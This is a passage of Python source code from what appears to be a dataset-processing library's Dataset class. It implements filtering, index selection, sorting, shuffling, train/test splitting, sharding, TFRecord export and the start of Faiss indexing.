update_features = False\n if keep_in_memory or cache_file_name is None:\n buf_writer = pa.BufferOutputStream()\n tmp_file = None\n writer = ArrowWriter(\n features=features,\n stream=buf_writer,\n writer_batch_size=writer_batch_size,\n update_features=update_features,\n fingerprint=new_fingerprint,\n )\n else:\n buf_writer = None\n logger.info(\"Caching processed dataset at %s\", cache_file_name)\n tmp_file = tempfile.NamedTemporaryFile(\"wb\", dir=os.path.dirname(cache_file_name), delete=False)\n writer = ArrowWriter(\n features=features,\n path=tmp_file.name,\n writer_batch_size=writer_batch_size,\n update_features=update_features,\n fingerprint=new_fingerprint,\n )\n\n try:\n # Loop over single examples or batches and write to buffer/file if examples are to be updated\n pbar_iterable = self if not batched else range(0, len(self), batch_size)\n pbar_unit = \"ex\" if not batched else \"ba\"\n pbar_desc = \"#\" + str(rank) if rank is not None else None\n pbar = tqdm(pbar_iterable, disable=not_verbose, position=rank, unit=pbar_unit, desc=pbar_desc)\n if not batched:\n for i, example in enumerate(pbar):\n example = apply_function_on_filtered_inputs(example, i, offset=offset)\n if update_data:\n example = cast_to_python_objects(example)\n writer.write(example)\n else:\n for i in pbar:\n if drop_last_batch and i + batch_size > self.num_rows:\n continue\n batch = self[i : i + batch_size]\n indices = list(range(*(slice(i, i + batch_size).indices(self.num_rows)))) # Something simpler?\n try:\n batch = apply_function_on_filtered_inputs(\n batch, indices, check_same_num_examples=len(self.list_indexes()) > 0, offset=offset\n )\n except NumExamplesMismatch:\n raise DatasetTransformationNotAllowedError(\n \"Using `.map` in batched mode on a dataset with attached indexes is allowed only if it doesn't create or remove existing examples. You can first run `.drop_index() to remove your index and then re-add it.\"\n )\n if update_data:\n batch = cast_to_python_objects(batch)\n writer.write_batch(batch)\n if update_data:\n writer.finalize() # close_stream=bool(buf_writer is None)) # We only close if we are writing in a file\n except (Exception, KeyboardInterrupt):\n if update_data and tmp_file is not None:\n if os.path.exists(tmp_file.name):\n os.remove(tmp_file.name)\n raise\n\n if update_data and tmp_file is not None:\n shutil.move(tmp_file.name, cache_file_name)\n\n if update_data:\n # Create new Dataset from buffer or file\n info = self.info.copy()\n info.features = writer._features\n if buf_writer is None:\n return Dataset.from_file(cache_file_name, info=info, split=self.split)\n else:\n return Dataset.from_buffer(buf_writer.getvalue(), info=info, split=self.split)\n else:\n return self\n\n @transmit_format\n @fingerprint(inplace=False)\n def filter(\n self,\n function: Optional[Callable] = None,\n with_indices=False,\n input_columns: Optional[Union[str, List[str]]] = None,\n batch_size: Optional[int] = 1000,\n remove_columns: Optional[List[str]] = None,\n keep_in_memory: bool = False,\n load_from_cache_file: bool = True,\n cache_file_name: Optional[str] = None,\n writer_batch_size: Optional[int] = 1000,\n fn_kwargs: Optional[dict] = None,\n num_proc: Optional[int] = None,\n suffix_template: str = \"_{rank:05d}_of_{num_proc:05d}\",\n new_fingerprint: Optional[str] = None,\n ) -> \"Dataset\":\n \"\"\"Apply a filter function to all the elements in the table in batches\n and update the table so that the dataset only includes examples according to the filter function.\n\n Args:\n function (`callable`): with one of the following signature:\n - `function(example: Union[Dict, Any]) -> bool` if `with_indices=False`\n - `function(example: Union[Dict, Any], indices: int) -> bool` if `with_indices=True`\n If no function is provided, default to an always True function: lambda x: True\n with_indices (`bool`, defaults to `False`): Provide example indices to `function`. Note that in this case the signature of `function` should be `def function(example, idx): ...`.\n input_columns (`Optional[Union[str, List[str]]]`, defaults to `None`): The columns to be passed into `function` as\n positional arguments. If `None`, a dict mapping to all formatted columns is passed as one argument.\n batch_size (`Optional[int]`, defaults to `1000`): Number of examples per batch provided to `function` if `batched=True`\n `batch_size <= 0` or `batch_size == None`: Provide the full dataset as a single batch to `function`\n remove_columns (`Optional[List[str]]`, defaults to `None`): Remove a selection of columns while doing the mapping.\n Columns will be removed before updating the examples with the output of `function`, i.e. if `function` is adding\n columns with names in `remove_columns`, these columns will be kept.\n keep_in_memory (`bool`, defaults to `False`): Keep the dataset in memory instead of writing it to a cache file.\n load_from_cache_file (`bool`, defaults to `True`): If a cache file storing the current computation from `function`\n can be identified, use it instead of recomputing.\n cache_file_name (`Optional[str]`, defaults to `None`): Provide the name of a cache file to use to store the\n results of the computation instead of the automatically generated cache file name.\n writer_batch_size (`int`, defaults to `1000`): Number of rows per write operation for the cache file writer.\n Higher value gives smaller cache files, lower value consume less temporary memory while running `.map()`.\n fn_kwargs (`Optional[Dict]`, defaults to `None`): Keyword arguments to be passed to `function`\n num_proc (`Optional[int]`, defaults to `None`): Number of processes for multiprocessing. By default it doesn't\n use multiprocessing.\n suffix_template (`str`, defaults to \"_{rank:05d}_of_{num_proc:05d}\"): If cache_file_name is specified, then this suffix\n will be added at the end of the base name of each. For example, if cache_file_name is \"processed.arrow\", then for\n rank=1 and num_proc=4, the resulting file would be \"processed_00001_of_00004.arrow\" for the default suffix.\n new_fingerprint (`Optional[str]`, defaults to `None`): the new fingerprint of the dataset after transform.\n If `None`, the new fingerprint is computed using a hash of the previous fingerprint, and the transform arguments\n \"\"\"\n if len(self.list_indexes()) > 0:\n raise DatasetTransformationNotAllowedError(\n \"Using `.filter` on a dataset with attached indexes is not allowed. You can first run `.drop_index() to remove your index and then re-add it.`\"\n )\n\n if function is None:\n function = lambda x: True # noqa: E731\n\n if isinstance(input_columns, str):\n input_columns = [input_columns]\n\n if input_columns is not None:\n for input_column in input_columns:\n if input_column not in self._data.column_names:\n raise ValueError(\n \"Input column {} not in the dataset. Current columns in the dataset: {}\".format(\n input_column, self._data.column_names\n )\n )\n\n if fn_kwargs is None:\n fn_kwargs = dict()\n fn_kwargs[\"input_columns\"] = input_columns\n\n # return map function\n return self.map(\n partial(map_function, function=function, with_indices=with_indices),\n batched=True,\n with_indices=with_indices,\n features=self.features,\n batch_size=batch_size,\n remove_columns=remove_columns,\n keep_in_memory=keep_in_memory,\n load_from_cache_file=load_from_cache_file,\n cache_file_name=cache_file_name,\n writer_batch_size=writer_batch_size,\n fn_kwargs=fn_kwargs,\n num_proc=num_proc,\n suffix_template=suffix_template,\n new_fingerprint=new_fingerprint,\n )\n\n @transmit_format\n @fingerprint(inplace=False)\n def flatten_indices(\n self,\n keep_in_memory: bool = False,\n cache_file_name: Optional[str] = None,\n writer_batch_size: Optional[int] = 1000,\n features: Optional[Features] = None,\n disable_nullable: bool = True,\n new_fingerprint: Optional[str] = None,\n ) -> \"Dataset\":\n \"\"\"Create and cache a new Dataset by flattening the indices mapping.\n\n Args:\n keep_in_memory (`bool`, default: `False`): Keep the dataset in memory instead of writing it to a cache file.\n cache_file_name (`Optional[str]`, defaults to `None`): Provide the name of a cache file to use to store the\n results of the computation instead of the automatically generated cache file name.\n writer_batch_size (`int`, defaults to `1000`): Number of rows per write operation for the cache file writer.\n Higher value gives smaller cache files, lower value consume less temporary memory while running `.map()`.\n features (`Optional[datasets.Features]`, default: `None`): Use a specific Features to store the cache file\n instead of the automatically generated one.\n disable_nullable (`bool`, default: `True`): Allow null values in the table.\n new_fingerprint (`Optional[str]`, defaults to `None`): the new fingerprint of the dataset after transform.\n If `None`, the new fingerprint is computed using a hash of the previous fingerprint, and the transform arguments\n \"\"\"\n\n return self.map(\n batched=True, # for speed\n keep_in_memory=keep_in_memory,\n cache_file_name=cache_file_name,\n writer_batch_size=writer_batch_size,\n features=features,\n disable_nullable=disable_nullable,\n new_fingerprint=new_fingerprint,\n )\n\n def _new_dataset_with_indices(\n self,\n indices_cache_file_name: Optional[str] = None,\n indices_buffer: Optional[pa.Buffer] = None,\n fingerprint: Optional[str] = None,\n ) -> \"Dataset\":\n \"\"\" Return a new Dataset obtained by adding indices (provided in indices_cache_file_name or in a buffer) to the current Dataset. \"\"\"\n\n assert (\n indices_cache_file_name is not None or indices_buffer is not None\n ), \"At least one of indices_cache_file_name or indices_buffer must be provided.\"\n\n assert fingerprint is not None, \"please specify a fingerprint for the dataset with indices\"\n data_files = self._data_files\n if indices_cache_file_name is not None:\n indices_mmap = pa.memory_map(indices_cache_file_name)\n if data_files is None:\n data_files = []\n indices_data_files = [{\"filename\": indices_cache_file_name}]\n else:\n indices_mmap = pa.BufferReader(indices_buffer)\n indices_data_files = None\n indices_f = pa.ipc.open_stream(indices_mmap)\n indices_pa_table = indices_f.read_all()\n\n # Return new Dataset object\n return Dataset(\n self._data,\n data_files=data_files,\n info=self.info,\n split=self.split,\n indices_table=indices_pa_table,\n indices_data_files=indices_data_files,\n fingerprint=fingerprint,\n inplace_history=self._inplace_history, # in-place transforms have to be kept as we kept the same data_files\n )\n\n @transmit_format\n @fingerprint(inplace=False)\n def select(\n self,\n indices: Iterable,\n keep_in_memory: bool = False,\n indices_cache_file_name: Optional[str] = None,\n writer_batch_size: Optional[int] = 1000,\n new_fingerprint: Optional[str] = None,\n ) -> \"Dataset\":\n \"\"\"Create a new dataset with rows selected following the list/array of indices.\n\n Args:\n `indices` (sequence, iterable, ndarray or Series): List or 1D-array of integer indices for indexing.\n `keep_in_memory` (`bool`, default: `False`): Keep the indices mapping in memory instead of writing it to a cache file.\n `indices_cache_file_name` (`Optional[str]`, default: `None`): Provide the name of a cache file to use to store the\n indices mapping instead of the automatically generated cache file name.\n `writer_batch_size` (`int`, default: `1000`): Number of rows per write operation for the cache file writer.\n Higher value gives smaller cache files, lower value consume less temporary memory while running `.map()`.\n new_fingerprint (`Optional[str]`, defaults to `None`): the new fingerprint of the dataset after transform.\n If `None`, the new fingerprint is computed using a hash of the previous fingerprint, and the transform arguments\n \"\"\"\n assert (\n not keep_in_memory or indices_cache_file_name is None\n ), \"Please use either `keep_in_memory` or `indices_cache_file_name` but not both.\"\n if len(self.list_indexes()) > 0:\n raise DatasetTransformationNotAllowedError(\n \"Using `.select` on a dataset with attached indexes is not allowed. You can first run `.drop_index() to remove your index and then re-add it.\"\n )\n\n # If the array is empty we do nothing\n if len(self) == 0:\n return self\n\n # Prepare the writer for our indices arrow table\n if keep_in_memory or indices_cache_file_name is None:\n buf_writer = pa.BufferOutputStream()\n tmp_file = None\n writer = ArrowWriter(\n stream=buf_writer, writer_batch_size=writer_batch_size, fingerprint=new_fingerprint, unit=\"indices\"\n )\n else:\n buf_writer = None\n logger.info(\"Caching indices mapping at %s\", indices_cache_file_name)\n tmp_file = tempfile.NamedTemporaryFile(\"wb\", dir=os.path.dirname(indices_cache_file_name), delete=False)\n writer = ArrowWriter(\n path=tmp_file.name, writer_batch_size=writer_batch_size, fingerprint=new_fingerprint, unit=\"indices\"\n )\n\n indices_array = pa.array(indices, type=pa.uint64())\n # Check if we need to convert indices\n if self._indices is not None:\n if PYARROW_V0:\n indices_array = pa.concat_tables(self._indices.slice(i.as_py(), 1) for i in indices_array).column(0)\n else:\n indices_array = self._indices.column(0).take(indices_array)\n\n indices_table = pa.Table.from_arrays([indices_array], names=[\"indices\"])\n\n try:\n writer.write_table(indices_table)\n writer.finalize() # close_stream=bool(buf_writer is None)) # We only close if we are writing in a file\n except (Exception, KeyboardInterrupt):\n if tmp_file is not None:\n if os.path.exists(tmp_file.name):\n os.remove(tmp_file.name)\n raise\n\n if tmp_file is not None:\n shutil.move(tmp_file.name, indices_cache_file_name)\n\n # Return new Dataset object\n if buf_writer is None:\n return self._new_dataset_with_indices(\n indices_cache_file_name=indices_cache_file_name, fingerprint=new_fingerprint\n )\n else:\n return self._new_dataset_with_indices(indices_buffer=buf_writer.getvalue(), fingerprint=new_fingerprint)\n\n @transmit_format\n @fingerprint(inplace=False)\n def sort(\n self,\n column: str,\n reverse: bool = False,\n kind: str = None,\n keep_in_memory: bool = False,\n load_from_cache_file: bool = True,\n indices_cache_file_name: Optional[str] = None,\n writer_batch_size: Optional[int] = 1000,\n new_fingerprint: Optional[str] = None,\n ) -> \"Dataset\":\n \"\"\"Create a new dataset sorted according to a column.\n\n Currently sorting according to a column name uses numpy sorting algorithm under the hood.\n The column should thus be a numpy compatible type (in particular not a nested type).\n This also means that the column used for sorting is fully loaded in memory (which should be fine in most cases).\n\n Args:\n column (`str`): column name to sort by.\n reverse: (`bool`, defaults to `False`): If True, sort by descending order rather then ascending.\n kind (Optional `str`): Numpy algorithm for sorting selected in {‘quicksort’, ‘mergesort’, ‘heapsort’, ‘stable’},\n The default is ‘quicksort’. Note that both ‘stable’ and ‘mergesort’ use timsort under the covers and, in general,\n the actual implementation will vary with data type. The ‘mergesort’ option is retained for backwards compatibility.\n keep_in_memory (`bool`, defaults to `False`): Keep the sorted indices in memory instead of writing it to a cache file.\n load_from_cache_file (`bool`, defaults to `True`): If a cache file storing the sorted indices\n can be identified, use it instead of recomputing.\n indices_cache_file_name (`Optional[str]`, defaults to `None`): Provide the name of a cache file to use to store the\n sorted indices instead of the automatically generated cache file name.\n writer_batch_size (`int`, defaults to `1000`): Number of rows per write operation for the cache file writer.\n Higher value gives smaller cache files, lower value consume less temporary memory.\n new_fingerprint (`Optional[str]`, defaults to `None`): the new fingerprint of the dataset after transform.\n If `None`, the new fingerprint is computed using a hash of the previous fingerprint, and the transform arguments\n \"\"\"\n if len(self.list_indexes()) > 0:\n raise DatasetTransformationNotAllowedError(\n \"Using `.sort` on a dataset with attached indexes is not allowed. You can first run `.drop_index() to remove your index and then re-add it.\"\n )\n # If the array is empty we do nothing\n if len(self) == 0:\n return self\n\n # Check the column name\n if not isinstance(column, str) or column not in self._data.column_names:\n raise ValueError(\n \"Column '{}' not found in the dataset. Please provide a column selected in: {}\".format(\n column,\n self._data.column_names,\n )\n )\n\n # Check if we've already cached this computation (indexed by a hash)\n if self._data_files:\n if indices_cache_file_name is None:\n # we create a unique hash from the function, current dataset file and the mapping args\n indices_cache_file_name = self._get_cache_file_path(new_fingerprint)\n if os.path.exists(indices_cache_file_name) and load_from_cache_file:\n logger.warning(\"Loading cached sorted indices for dataset at %s\", indices_cache_file_name)\n return self._new_dataset_with_indices(\n fingerprint=new_fingerprint, indices_cache_file_name=indices_cache_file_name\n )\n\n column_data = self._getitem(\n column, format_type=\"numpy\", format_columns=None, output_all_columns=False, format_kwargs=None\n )\n indices = np.argsort(column_data, kind=kind)\n if reverse:\n indices = indices[::-1]\n\n return self.select(\n indices=indices,\n keep_in_memory=keep_in_memory,\n indices_cache_file_name=indices_cache_file_name,\n writer_batch_size=writer_batch_size,\n new_fingerprint=new_fingerprint,\n )\n\n @transmit_format\n @fingerprint(inplace=False, randomized_function=True)\n def shuffle(\n self,\n seed: Optional[int] = None,\n generator: Optional[np.random.Generator] = None,\n keep_in_memory: bool = False,\n load_from_cache_file: bool = True,\n indices_cache_file_name: Optional[str] = None,\n writer_batch_size: Optional[int] = 1000,\n new_fingerprint: Optional[str] = None,\n ) -> \"Dataset\":\n \"\"\"Create a new Dataset where the rows are shuffled.\n\n Currently shuffling uses numpy random generators.\n You can either supply a NumPy BitGenerator to use, or a seed to initiate NumPy's default random generator (PCG64).\n\n Args:\n seed (Optional `int`): A seed to initialize the default BitGenerator if ``generator=None``.\n If None, then fresh, unpredictable entropy will be pulled from the OS.\n If an int or array_like[ints] is passed, then it will be passed to SeedSequence to derive the initial BitGenerator state.\n generator (Optional `np.random.Generator`): Numpy random Generator to use to compute the permutation of the dataset rows.\n If ``generator=None`` (default), uses np.random.default_rng (the default BitGenerator (PCG64) of NumPy).\n keep_in_memory (`bool`, defaults to `False`): Keep the shuffled indices in memory instead of writing it to a cache file.\n load_from_cache_file (`bool`, defaults to `True`): If a cache file storing the shuffled indices\n can be identified, use it instead of recomputing.\n indices_cache_file_name (`Optional[str]`, defaults to `None`): Provide the name of a cache file to use to store the\n shuffled indices instead of the automatically generated cache file name.\n writer_batch_size (`int`, defaults to `1000`): Number of rows per write operation for the cache file writer.\n Higher value gives smaller cache files, lower value consume less temporary memory while running `.map()`.\n new_fingerprint (`Optional[str]`, defaults to `None`): the new fingerprint of the dataset after transform.\n If `None`, the new fingerprint is computed using a hash of the previous fingerprint, and the transform arguments\n \"\"\"\n if len(self.list_indexes()) > 0:\n raise DatasetTransformationNotAllowedError(\n \"Using `.shuffle` on a dataset with attached indexes is not allowed. You can first run `.drop_index() to remove your index and then re-add it.\"\n )\n # If the array is empty we do nothing\n if len(self) == 0:\n return self\n\n if seed is not None and generator is not None:\n raise ValueError(\"Both `seed` and `generator` were provided. Please specify just one of them.\")\n\n assert generator is None or isinstance(\n generator, np.random.Generator\n ), \"The provided generator must be an instance of numpy.random.Generator\"\n\n if generator is None:\n if seed is None:\n seed = np.random.get_state()[1][0]\n _ = np.random.random() # do 1 step of rng\n generator = np.random.default_rng(seed)\n\n # Check if we've already cached this computation (indexed by a hash)\n if self._data_files:\n if indices_cache_file_name is None:\n # we create a unique hash from the function, current dataset file and the mapping args\n indices_cache_file_name = self._get_cache_file_path(new_fingerprint)\n if os.path.exists(indices_cache_file_name) and load_from_cache_file:\n logger.warning(\"Loading cached shuffled indices for dataset at %s\", indices_cache_file_name)\n return self._new_dataset_with_indices(\n fingerprint=new_fingerprint, indices_cache_file_name=indices_cache_file_name\n )\n\n permutation = generator.permutation(len(self))\n\n return self.select(\n indices=permutation,\n keep_in_memory=keep_in_memory,\n indices_cache_file_name=indices_cache_file_name,\n writer_batch_size=writer_batch_size,\n new_fingerprint=new_fingerprint,\n )\n\n @transmit_format\n @fingerprint(\n inplace=False, randomized_function=True, fingerprint_names=[\"train_new_fingerprint\", \"test_new_fingerprint\"]\n )\n def train_test_split(\n self,\n test_size: Union[float, int, None] = None,\n train_size: Union[float, int, None] = None,\n shuffle: bool = True,\n seed: Optional[int] = None,\n generator: Optional[np.random.Generator] = None,\n keep_in_memory: bool = False,\n load_from_cache_file: bool = True,\n train_indices_cache_file_name: Optional[str] = None,\n test_indices_cache_file_name: Optional[str] = None,\n writer_batch_size: Optional[int] = 1000,\n train_new_fingerprint: Optional[str] = None,\n test_new_fingerprint: Optional[str] = None,\n ) -> \"DatasetDict\":\n \"\"\"Return a dictionary (:obj:`datasets.DatsetDict`) with two random train and test subsets (`train` and `test` ``Dataset`` splits).\n Splits are created from the dataset according to `test_size`, `train_size` and `shuffle`.\n\n This method is similar to scikit-learn `train_test_split` with the omission of the stratified options.\n\n Args:\n test_size (Optional `np.random.Generator`): Size of the test split\n If float, should be between 0.0 and 1.0 and represent the proportion of the dataset to include in the test split.\n If int, represents the absolute number of test samples.\n If None, the value is set to the complement of the train size.\n If train_size is also None, it will be set to 0.25.\n train_size (Optional `np.random.Generator`): Size of the train split\n If float, should be between 0.0 and 1.0 and represent the proportion of the dataset to include in the train split.\n If int, represents the absolute number of train samples.\n If None, the value is automatically set to the complement of the test size.\n shuffle (Optional `bool`, defaults to `True`): Whether or not to shuffle the data before splitting.\n seed (Optional `int`): A seed to initialize the default BitGenerator if ``generator=None``.\n If None, then fresh, unpredictable entropy will be pulled from the OS.\n If an int or array_like[ints] is passed, then it will be passed to SeedSequence to derive the initial BitGenerator state.\n generator (Optional `np.random.Generator`): Numpy random Generator to use to compute the permutation of the dataset rows.\n If ``generator=None`` (default), uses np.random.default_rng (the default BitGenerator (PCG64) of NumPy).\n keep_in_memory (`bool`, defaults to `False`): Keep the splits indices in memory instead of writing it to a cache file.\n load_from_cache_file (`bool`, defaults to `True`): If a cache file storing the splits indices\n can be identified, use it instead of recomputing.\n train_cache_file_name (`Optional[str]`, defaults to `None`): Provide the name of a cache file to use to store the\n train split indices instead of the automatically generated cache file name.\n test_cache_file_name (`Optional[str]`, defaults to `None`): Provide the name of a cache file to use to store the\n test split indices instead of the automatically generated cache file name.\n writer_batch_size (`int`, defaults to `1000`): Number of rows per write operation for the cache file writer.\n Higher value gives smaller cache files, lower value consume less temporary memory while running `.map()`.\n train_new_fingerprint (`Optional[str]`, defaults to `None`): the new fingerprint of the train set after transform.\n If `None`, the new fingerprint is computed using a hash of the previous fingerprint, and the transform arguments\n test_new_fingerprint (`Optional[str]`, defaults to `None`): the new fingerprint of the test set after transform.\n If `None`, the new fingerprint is computed using a hash of the previous fingerprint, and the transform arguments\n \"\"\"\n from .dataset_dict import DatasetDict # import here because of circular dependency\n\n if len(self.list_indexes()) > 0:\n raise DatasetTransformationNotAllowedError(\n \"Using `.train_test_split` on a dataset with attached indexes is not allowed. You can first run `.drop_index() to remove your index and then re-add it.\"\n )\n # If the array is empty we do nothing\n if len(self) == 0:\n return DatasetDict({\"train\": self, \"test\": self})\n\n if test_size is None and train_size is None:\n test_size = 0.25\n\n # Safety checks similar to scikit-learn's ones.\n # (adapted from https://github.com/scikit-learn/scikit-learn/blob/fd237278e895b42abe8d8d09105cbb82dc2cbba7/sklearn/model_selection/_split.py#L1750)\n n_samples = len(self)\n if (\n isinstance(test_size, int)\n and (test_size >= n_samples or test_size <= 0)\n or isinstance(test_size, float)\n and (test_size <= 0 or test_size >= 1)\n ):\n raise ValueError(\n f\"test_size={test_size} should be either positive and smaller \"\n f\"than the number of samples {n_samples} or a float in the (0, 1) range\"\n )\n\n if (\n isinstance(train_size, int)\n and (train_size >= n_samples or train_size <= 0)\n or isinstance(train_size, float)\n and (train_size <= 0 or train_size >= 1)\n ):\n raise ValueError(\n f\"train_size={train_size} should be either positive and smaller \"\n f\"than the number of samples {n_samples} or a float in the (0, 1) range\"\n )\n\n if train_size is not None and not isinstance(train_size, (int, float)):\n raise ValueError(f\"Invalid value for train_size: {train_size} of type {type(train_size)}\")\n if test_size is not None and not isinstance(test_size, (int, float)):\n raise ValueError(f\"Invalid value for test_size: {test_size} of type {type(test_size)}\")\n\n if isinstance(train_size, float) and isinstance(test_size, float) and train_size + test_size > 1:\n raise ValueError(\n f\"The sum of test_size and train_size = {train_size + test_size}, should be in the (0, 1)\"\n \" range. Reduce test_size and/or train_size.\"\n )\n\n if isinstance(test_size, float):\n n_test = ceil(test_size * n_samples)\n elif isinstance(test_size, int):\n n_test = float(test_size)\n\n if isinstance(train_size, float):\n n_train = floor(train_size * n_samples)\n elif isinstance(train_size, int):\n n_train = float(train_size)\n\n if train_size is None:\n n_train = n_samples - n_test\n elif test_size is None:\n n_test = n_samples - n_train\n\n if n_train + n_test > n_samples:\n raise ValueError(\n f\"The sum of train_size and test_size = {n_train + n_test}, \"\n \"should be smaller than the number of \"\n f\"samples {n_samples}. Reduce test_size and/or \"\n \"train_size.\"\n )\n\n n_train, n_test = int(n_train), int(n_test)\n\n if n_train == 0:\n raise ValueError(\n f\"With n_samples={n_samples}, test_size={test_size} and train_size={train_size}, the \"\n \"resulting train set will be empty. Adjust any of the \"\n \"aforementioned parameters.\"\n )\n\n if generator is None and shuffle is True:\n if seed is None:\n seed = np.random.get_state()[1][0]\n _ = np.random.random() # do 1 step of rng\n generator = np.random.default_rng(seed)\n\n # Check if we've already cached this computation (indexed by a hash)\n if self._data_files:\n if train_indices_cache_file_name is None or test_indices_cache_file_name is None:\n # we create a unique hash from the function, current dataset file and the mapping args\n\n if train_indices_cache_file_name is None:\n train_indices_cache_file_name = self._get_cache_file_path(train_new_fingerprint)\n if test_indices_cache_file_name is None:\n test_indices_cache_file_name = self._get_cache_file_path(test_new_fingerprint)\n if (\n os.path.exists(train_indices_cache_file_name)\n and os.path.exists(test_indices_cache_file_name)\n and load_from_cache_file\n ):\n logger.warning(\n \"Loading cached split indices for dataset at %s and %s\",\n train_indices_cache_file_name,\n test_indices_cache_file_name,\n )\n return DatasetDict(\n {\n \"train\": self._new_dataset_with_indices(\n fingerprint=train_new_fingerprint, indices_cache_file_name=train_indices_cache_file_name\n ),\n \"test\": self._new_dataset_with_indices(\n fingerprint=test_new_fingerprint, indices_cache_file_name=test_indices_cache_file_name\n ),\n }\n )\n\n if not shuffle:\n train_indices = np.arange(n_train)\n test_indices = np.arange(n_train, n_train + n_test)\n else:\n # random partition\n permutation = generator.permutation(len(self))\n test_indices = permutation[:n_test]\n train_indices = permutation[n_test : (n_test + n_train)]\n\n train_split = self.select(\n indices=train_indices,\n keep_in_memory=keep_in_memory,\n indices_cache_file_name=train_indices_cache_file_name,\n writer_batch_size=writer_batch_size,\n new_fingerprint=train_new_fingerprint,\n )\n test_split = self.select(\n indices=test_indices,\n keep_in_memory=keep_in_memory,\n indices_cache_file_name=test_indices_cache_file_name,\n writer_batch_size=writer_batch_size,\n new_fingerprint=test_new_fingerprint,\n )\n\n return DatasetDict({\"train\": train_split, \"test\": test_split})\n\n def shard(\n self,\n num_shards: int,\n index: int,\n contiguous: bool = False,\n keep_in_memory: bool = False,\n indices_cache_file_name: Optional[str] = None,\n writer_batch_size: Optional[int] = 1000,\n ) -> \"Dataset\":\n \"\"\"Return the `index`-nth shard from dataset split into `num_shards` pieces.\n\n This shards deterministically. dset.shard(n, i) will contain all elements of dset whose\n index mod n = i.\n\n dset.shard(n, i, contiguous=True) will instead split dset into contiguous chunks,\n so it can be easily concatenated back together after processing. If n % i == l, then the\n first l shards will have length (n // i) + 1, and the remaining shards will have length (n // i).\n `datasets.concatenate([dset.shard(n, i, contiguous=True) for i in range(n)])` will return\n a dataset with the same order as the original.\n\n Be sure to shard before using any randomizing operator (such as shuffle).\n It is best if the shard operator is used early in the dataset pipeline.\n\n\n Args:\n num_shards (`int`): How many shards to split the dataset into.\n index (`int`): Which shard to select and return.\n contiguous: (`bool`, defaults to `False`): Whether to select contiguous blocks of indices for shards.\n keep_in_memory (`bool`, defaults to `False`): Keep the dataset in memory instead of writing it to a cache file.\n load_from_cache_file (`bool`, defaults to `True`): If a cache file storing the current computation from `function`\n can be identified, use it instead of recomputing.\n indices_cache_file_name (`Optional[str]`, defaults to `None`): Provide the name of a cache file to use to store the\n indices of each shard instead of the automatically generated cache file name.\n writer_batch_size (`int`, defaults to `1000`): Number of rows per write operation for the cache file writer.\n Higher value gives smaller cache files, lower value consume less temporary memory while running `.map()`.\n \"\"\"\n assert 0 <= index < num_shards, \"index should be in [0, num_shards-1]\"\n if contiguous:\n div = len(self) // num_shards\n mod = len(self) % num_shards\n start = div * index + min(index, mod)\n end = start + div + (1 if index < mod else 0)\n indices = np.arange(start, end)\n else:\n indices = np.arange(index, len(self), num_shards)\n\n return self.select(\n indices=indices,\n keep_in_memory=keep_in_memory,\n indices_cache_file_name=indices_cache_file_name,\n writer_batch_size=writer_batch_size,\n )\n\n def export(\n self,\n filename: str,\n format: str = \"tfrecord\",\n ):\n \"\"\"Writes the Arrow dataset to a TFRecord file.\n\n The dataset must already be in tensorflow format. The records will be written with\n keys from `dataset._format_columns`.\n\n Args:\n `filename` (`str`): The filename, including the .tfrecord extension, to write to.\n `format` (`Optional[str]`, default: `\"tfrecord\"`): The type of output file. Currently this is a no-op, as\n TFRecords are the only option. This enables a more flexible function signature\n later.\n \"\"\"\n try:\n import tensorflow as tf # noqa: F401\n except ImportError:\n logger.error(\"Tensorflow needs to be installed to be able to return Tensorflow tensors.\")\n\n # From https://www.tensorflow.org/tutorials/load_data/tfrecord\n def _bytes_feature(values):\n \"\"\"Returns a bytes_list from a list of string / byte.\"\"\"\n return tf.train.Feature(bytes_list=tf.train.BytesList(value=values))\n\n def _float_feature(values):\n \"\"\"Returns a float_list from a list of float / double.\"\"\"\n return tf.train.Feature(float_list=tf.train.FloatList(value=values))\n\n def _int64_feature(values):\n \"\"\"Returns an int64_list from a list of bool / enum / int / uint.\"\"\"\n return tf.train.Feature(int64_list=tf.train.Int64List(value=values))\n\n def _feature(values: np.ndarray) -> \"tf.train.Feature\":\n \"\"\"Typechecks `values` and returns the corresponding tf.train.Feature.\"\"\"\n if values.ndim == 0:\n values = values.item()\n if isinstance(values, np.ndarray):\n if values.dtype == np.dtype(float):\n return _float_feature(values)\n elif values.dtype == np.dtype(int):\n return _int64_feature(values)\n elif values.dtype == np.dtype(str) or (\n values.dtype == np.dtype(object) and len(values) > 0 and isinstance(values[0], str)\n ):\n return _bytes_feature([v.encode() for v in values])\n else:\n raise ValueError(\n f\"values={values} is an np.ndarray with items of dtype {values[0].dtype}, which cannot be serialized\"\n )\n elif isinstance(values, float):\n return _float_feature([values])\n elif isinstance(values, int):\n return _int64_feature([values])\n elif isinstance(values, str):\n return _bytes_feature([values.encode()])\n else:\n raise ValueError(f\"values={values} has dtype {values.dtype}, which cannot be serialized\")\n\n def serialize_example(ex):\n feature = {key: _feature(value) for key, value in ex.items()}\n example_proto = tf.train.Example(features=tf.train.Features(feature=feature))\n return example_proto.SerializeToString()\n\n def tf_serialize_example(ex):\n tf_string = tf.py_function(serialize_example, (ex,), tf.string)\n return tf.reshape(tf_string, ())\n\n def generator():\n for ex in self:\n yield serialize_example(ex)\n\n assert self._format_type == \"numpy\", \"Dataset format must be numpy before exporting\"\n assert filename.endswith(\".tfrecord\")\n tf_dataset = tf.data.Dataset.from_generator(generator, output_types=tf.string, output_shapes=())\n writer = tf.data.experimental.TFRecordWriter(filename)\n logger.info(f\"Writing TFRecord to {filename}\")\n writer.write(tf_dataset)\n logger.info(f\"Finished writing TFRecord to {filename}\")\n\n def add_faiss_index(\n self,\n column: str,\n index_name: Optional[str] = None,\n device: Optional[int] = None,\n string_factory: Optional[str] = None,\n metric_type: Optional[int] = None,\n custom_index: Optional[\"faiss.Index\"] = None, # noqa: F821\n train_size: Optional[int] = None,\n faiss_verbose: bool = False,\n dtype=np.float32,\n ):\n \"\"\"Add a dense index using Faiss for fast retrieval.\n By default the index is done over the vectors of the specified column.\n You can specify :obj:`device` if you want to run it on GPU (:obj:`device` must be the GPU index).\n You can find more information about Faiss here:\n\n - For `string factory `__\n\n Args:\n column (:obj:`str`):\n The column of the vectors to add to the index.\n index_name (Optional :obj:`str`):\n The index_name/identifier of the index.\n This is the index_name that is used to call :func:`datasets.Dataset.get_nearest_examples` or :func:`datasets.Dataset.search`.\n By default it corresponds to `column`.\n device (Optional :obj:`int`):\n If not None, this is the index of the GPU to use.\n By default it uses the CPU.\n string_factory (Optional :obj:`str`):\n This is passed to the index factory of Faiss to create the index.\n Default index class is ``IndexFlat``.\n metric_type (Optional 